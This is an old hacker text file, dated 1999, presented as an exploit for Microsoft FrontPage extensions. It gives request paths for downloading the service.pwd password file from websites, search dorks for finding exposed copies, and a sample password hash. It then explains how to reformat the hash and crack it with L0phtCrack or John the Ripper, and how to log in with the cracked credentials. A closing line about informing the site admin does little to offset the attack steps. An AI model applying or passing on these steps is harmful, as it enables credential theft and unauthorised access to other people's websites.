============================================
FRONTPAGE EXTENSIONS
============================================
Author : Netw0rk Bug
E-Mail : bug@netw0rk.freeserve.co.uk
Date : MAY 1999
============================================


If a system is running FrontPage extensions, then you can do the following to
pull their service.pwd password file...

     http://www.site.here.com/_vti_pvt/service.pwd

Most of the time this will return a password file with around 4 lines in it,
the passwords will be encrypted, but if you use L0phTCrack (available from
www.l0pht.com), then you can break the encryption.

if the service.pwd doesn't exist, then check out the files in /_vti_pvt, as
they will be listed straight off.

Also, certain users may have FrontPage extensions installed, so try URL's
like...

     http://www.site.here.com/~mike/_vti_pvt/service.pwd

We're sure you get the idea, a simple yet affective exploit.

Other ways of obtaining service.pwdhttp://ftpsearch.com/index.html
search for service.pwdhttp://www.alstavista.digital.com
advanced search for link:"/_vti_pvt/service.pwd"


If service.pwd is obtained it will look similar to this:
Dave:J7U7OJ9zkEKNC

The above password is apple
Turn it into DES format:

Dave:J7U7OJ9zkEKNC:10:200:Dave:/users/dave:/bin/bash

Then all you need to do is run a cracker like John The Ripper.
I covered how to use this in a previous bug file.

Then you can load up frontpage then connect to the webpage with the user and pass you cracked.
However.. we are not going to do this are we? We are going to tell the website admin about the lack
of security.